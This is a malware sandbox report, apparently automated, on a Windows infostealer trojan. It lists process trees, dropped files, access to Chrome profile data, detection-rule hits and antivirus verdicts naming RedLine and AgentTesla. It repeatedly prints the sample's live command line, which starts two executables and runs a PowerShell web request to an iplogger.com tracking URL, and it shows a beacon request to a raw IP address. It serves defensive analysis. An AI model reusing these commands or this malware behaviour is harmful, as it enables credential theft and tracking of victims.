Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | April 18, 2023, 5:31 p.m. | April 18, 2023, 5:38 p.m. |
-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2124-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2268-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2524-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2992-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2804-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
1020-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2848-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2224-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3092-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3620-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3932-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3384-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
1676-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4008-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2596-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4012-
-
cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4120-
Togwcstgxg.exe "Togwcstgxg.exe"
4196
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3184 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4044
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2444 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3684
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3228 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2060
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3096 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3848
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3172 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3412
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3492 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3760
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3888 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3156
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
3576 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3748
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
368 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3216
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2668 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2908
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
1820 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2196
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2264 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2400
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2752 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
1688
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2896 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2080
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2404 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2552
-
-
-
Yosdofwiqay.exe "Yosdofwiqay.exe"
2628 -
powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
2736
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
23.95.97.22 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\default_apps |
section | .ndata |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://23.95.97.22/getid.php?id=jnhmegjcjneklkbcajooihfbfioojjjk |
request | GET http://23.95.97.22/getid.php?id=jnhmegjcjneklkbcajooihfbfioojjjk |
description | Togwcstgxg.exe tried to sleep 150 seconds, actually delayed analysis time by 150 seconds | |||
description | Yosdofwiqay.exe tried to sleep 225 seconds, actually delayed analysis time by 225 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Rules |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\43 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\2022.9.20.1141 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.91 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Thumbnails |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\52 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\7605 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\blob_storage |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\VideoDecodeStats |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\2021.8.2.1142 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\2673 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\91.265.200 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\2018.8.8.0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Code Cache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\101.3.34.11 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\databases |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2209.0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GCM Store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\IndexedDB |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\File System |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl |
file | C:\Users\test22\AppData\Local\Temp\nsk8999.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsp774.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsv3CD1.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsjEDE6.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsxD04C.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nswC0DB.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsu20ED.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nslD9B2.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsiD095.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsjC6E6.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\Yosdofwiqay.exe |
file | C:\Users\test22\AppData\Local\Temp\nsnE892.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nscDDB9.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsvE432.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsm677B.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsb26.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nse54E8.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55" |
cmdline | powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55" |
file | C:\Users\test22\AppData\Local\Temp\Yosdofwiqay.exe |
file | C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp\UQ0ULUGAM6014M.dll |
url | https://webbrowsertools.com/webgl-fingerprint/ |
url | http://nsis.sf.net/NSIS_Error |
url | https://iplogger.com/1wjx55 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active |
host | 23.95.97.22 |
file | C:\Users\test22\AppData\Local\Temp\nsa8870.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsk8999.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsk8999.tmp |
file | C:\Users\test22\AppData\Local\Temp\nscDDB9.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsnDDA9.tmp |
file | C:\Users\test22\AppData\Local\Temp\nscDDB9.tmp\UQ0ULUGAM6014M.dll |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1688.4922000 |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1688.4922000 |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b1a70.TMP |
file | C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1688.4922000 |
file | C:\Users\test22\AppData\Local\Temp\nsv3CD1.tmp |
file | C:\Users\test22\AppData\Local\Temp\nse3A40.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsv3CD1.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsm677B.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsm677B.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nsb669F.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp |
file | C:\Users\test22\AppData\Local\Temp\nshC3D7.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsnC3F8.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nswFFB8.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsb26.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsb26.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nstC6D5.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsjC6E6.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsjC6E6.tmp\UQ0ULUGAM6014M.dll |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3760.4966328 |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3760.4966328 |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4bc69e.TMP |
file | C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3760.4966328 |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2080.4919875 |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b1214.TMP |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2080.4919875 |
file | C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2080.4919890 |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2196.4925421 |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b26b5.TMP |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2196.4925421 |
file | C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2196.4925421 |
file | C:\Users\test22\AppData\Local\Temp\nslD9B2.tmp |
file | C:\Users\test22\AppData\Local\Temp\nslD9B2.tmp\UQ0ULUGAM6014M.dll |
file | C:\Users\test22\AppData\Local\Temp\nswD9A2.tmp |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3848.4987203 |
file | C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3848.4987203 |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4c18e5.TMP |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3848.4987203 |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3748.4950453 |
file | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3748.4950250 |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b880f.TMP |
file | C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3748.4950453 |
file | C:\Users\test22\AppData\Local\Temp\nse54E8.tmp |
file | C:\Users\test22\AppData\Local\Temp\nsn4518.tmp |
Lionic | Trojan.Win32.Convagent.4!c |
Elastic | malicious (high confidence) |
DrWeb | Trojan.Inject4.30942 |
MicroWorld-eScan | IL:Trojan.MSILZilla.11230 |
ClamAV | Win.Packed.Razy-9894224-0 |
FireEye | Generic.mg.7225b0d133ba9c85 |
CAT-QuickHeal | Trojanpws.Msil |
ALYac | Gen:Variant.Tedy.344411 |
Malwarebytes | Trojan.Downloader |
Sangfor | Suspicious.Win32.Save.ins |
Alibaba | TrojanPSW:MSIL/Convagent.801cadcc |
CrowdStrike | win/malicious_confidence_100% (W) |
Arcabit | IL:Trojan.MSILZilla.D2BDE [many] |
BitDefenderTheta | Gen:NN.ZemsilF.36132.Xn0@aWVMjTh |
Cyren | W32/ABRisk.DROR-7330 |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of MSIL/GenKryptik.GIHC |
APEX | Malicious |
Paloalto | generic.ml |
Cynet | Malicious (score: 100) |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | IL:Trojan.MSILZilla.11230 |
ViRobot | Trojan.Win.Z.Tedy.1561600 |
Avast | Win32:RATX-gen [Trj] |
Tencent | Msil.Trojan-Spy.Stealer.Unkl |
Sophos | Mal/Generic-S |
F-Secure | Heuristic.HEUR/AGEN.1363500 |
VIPRE | IL:Trojan.MSILZilla.11230 |
TrendMicro | TrojanSpy.Win32.REDLINE.YXDDOZ |
McAfee-GW-Edition | BehavesLike.Win32.PUP.tc |
Emsisoft | Trojan.Packed (A) |
Avira | HEUR/AGEN.1338066 |
MAX | malware (ai score=81) |
Antiy-AVL | Trojan/Win32.PossibleThreat |
Gridinsoft | Ransom.Win32.Wacatac.sa |
Microsoft | Trojan:Win32/Tiggre!rfn |
SUPERAntiSpyware | Trojan.Agent/Gen-Downloader |
ZoneAlarm | HEUR:Trojan-Spy.MSIL.Stealer.gen |
GData | Win32.Trojan.Ilgergop.5D60TK |
Detected | |
AhnLab-V3 | Trojan/Win.Generic.R441806 |
McAfee | Artemis!7225B0D133BA |
Cylance | unsafe |
Panda | Trj/CI.A |
TrendMicro-HouseCall | TrojanSpy.Win32.REDLINE.YXDDOZ |
Rising | Trojan.IPLogger/NSIS!1.C696 (CLASSIC:Y7I5aeSfKzIpfmrsEtBy2w) |
Ikarus | Trojan-Spy.AgentTesla |
Fortinet | MSIL/GenKryptik.GIHC!tr |
AVG | Win32:RATX-gen [Trj] |
DeepInstinct | MALICIOUS |